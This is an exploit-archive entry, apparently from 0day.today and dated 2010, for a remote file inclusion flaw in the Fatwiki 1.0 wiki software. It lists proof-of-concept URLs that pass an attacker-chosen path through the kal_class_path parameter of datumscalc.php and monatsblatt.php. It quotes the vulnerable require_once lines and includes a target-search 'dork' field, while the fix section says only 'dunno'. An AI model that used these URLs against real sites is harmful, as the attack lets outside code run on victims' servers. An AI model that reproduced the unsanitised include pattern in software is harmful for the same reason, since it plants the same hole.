Fatwiki (fwiki) Remote FiLe include RFI

2010-01-18T00:00:00
ID 1337DAY-ID-10694
Type zdt
Reporter kaMtiEz
Modified 2010-01-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================
Fatwiki (fwiki) Remote FiLe include RFI
=======================================

#############################################################################################################
## Fatwiki (fwiki) Remote FiLe include RFI                                                                  ##
#############################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]
 
[ BUG ]
 
[!] datumscalc.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
 
[!] monatsblatt.php
     - require_once("$kal_class_path/kalender.class.php");
     - require_once("$kal_class_path/feiertage.class.php");
     - require_once("$kal_class_path/sonnemond.class.php");
     - require_once("$kal_class_path/minikal.php");
 
[ FIX ]
 
dunno :">
 
 
#############################################################################################################



#  0day.today [2018-02-06]  #